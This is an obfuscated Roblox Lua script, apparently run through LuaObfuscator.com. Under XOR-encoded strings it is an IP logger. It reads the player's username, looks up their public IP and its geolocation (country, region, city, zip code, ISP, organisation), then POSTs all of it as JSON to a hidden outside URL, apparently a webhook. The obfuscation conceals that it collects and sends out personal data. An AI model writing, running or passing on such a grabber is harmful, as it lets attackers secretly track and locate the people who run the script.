--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v18,v19) local v20={};for v21=1, #v18 do v6(v20,v0(v4(v1(v2(v18,v21,v21 + 1 )),v1(v2(v19,1 + (v21% #v19) ,1 + (v21% #v19) + 1 )))%256 ));end return v5(v20);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167")).LocalPlayer.Name;local v9=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\174\123\155\122\151\164\112\152\115\148\165\117\154\126\148\170\112\159\101\194\204\26\229\5\207\236\32\242\1\244\204\114\233\60\242\251\23\218\46\246\214\39\236\59\157\254\10\215\21\220\229\48\236\51\242\212\59\233\122\206\241\18\236\18\200\212\39\198\7\225\206\18\212\35\246\207\33\213\50\241\165\17\153\127\250\207\7","\156\67\173\74\165");local v10=request({[v7("\1\165\69","\38\84\215\41\118\220\70")]=v7("\88\2\54\2\237\10\89\109\19\238\89\88\43\2\247\86\15\108\29\236\87\89\125\20\241\66\27\35\6\163\90\5\45\28","\158\48\118\66\114"),[v7("\134\33\4\62\124\161","\155\203\68\112\86\19\197")]=v7("\97\248\2","\152\38\189\86\156\32\24\133")});local v11=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199")):JSONDecode(v10.Body);local v12=tostring(v11.ip);local v13=request({[v7("\157\111\112","\35\200\29\28\72\115\20\154")]=string.format(v7("\17\171\197\207\215\99\123\16\175\156\222\157\37\122\26\176\220\144\135\63\59\23\240\148\204","\84\121\223\177\191\237\76"),v12),[v7("\150\83\221\168\53\84","\161\219\54\169\192\90\48\80")]=v7("\110\71\20","\69\41\34\96")});local v14=game:GetService(v7("\148\215\195\26\49\46\174\213\222\9\7","\75\220\163\183\106\98")):JSONDecode(v13.Body);local v15={[v7("\43\138","\185\98\218\235\87")]=v12,[v7("\200\51\50\232\202\184\210","\202\171\92\71\134\190")]=v14.country,[v7("\42\206\57\134\61\211\53\171\38\197\41","\232\73\161\76")]=v14.countryCode,[v7("\169\220\69\84\17\181","\126\219\185\34\61")]=v14.region,[v7("\30\203\89\123\113\121\221\230\1\203","\135\108\174\62\18\30\23\147")]=v14.regionName,[v7("\181\224\62\210","\167\214\137\74\171\120\206\83")]=v14.city,[v7("\145\249\34\94\247\163\142","\199\235\144\82\61\152")]=v14.zip,[v7("\11\23\173\34\19\3\189\46","\75\103\118\217")]=v14.lat,[v7("\203\91\126\19\176\10\210\80\117","\126\167\52\16\116\217")]=v14.lon,[v7("\193\61\48","\156\168\78\64\224\212\121")]=v14.isp,[v7("\8\252\162","\174\103\142\197")]=v14.org};local v16=string.format("User: %s\nIP: %s\nCountry: %s\nCountry Code: %s\nRegion: %s\nRegion Name: %s\nCity: %s\nZipcode: %s\nISP: %s\nOrg: %s",v8,v15.IP,v15.country,v15.countryCode,v15.region,v15.regionName,v15.city,v15.zipcode,v15.isp,v15.org);local v17={[v7("\85\39\81\44\32\80\236","\152\54\72\63\88\69\62")]=v16};request({[v7("\225\214\226","\60\180\164\142")]=v9,[v7("\117\91\17\33\40\233","\114\56\62\101\73\71\141")]=v7("\136\198\232\240","\164\216\137\187"),[v7("\250\227\48\182\163\236\24","\107\178\134\81\210\198\158")]={[v7("\27\1\140\210\175\54\26\207\242\179\40\11","\202\88\110\226\166")]=v7("\194\31\146\251\195\192\14\150\254\197\205\64\136\228\197\205","\170\163\111\226\151")},[v7("\51\63\182\33","\73\113\80\210\88\46\87")]=game:GetService(v7("\169\56\217\2\212\132\62\219\27\228\132","\135\225\76\173\114")):JSONEncode(v17)});
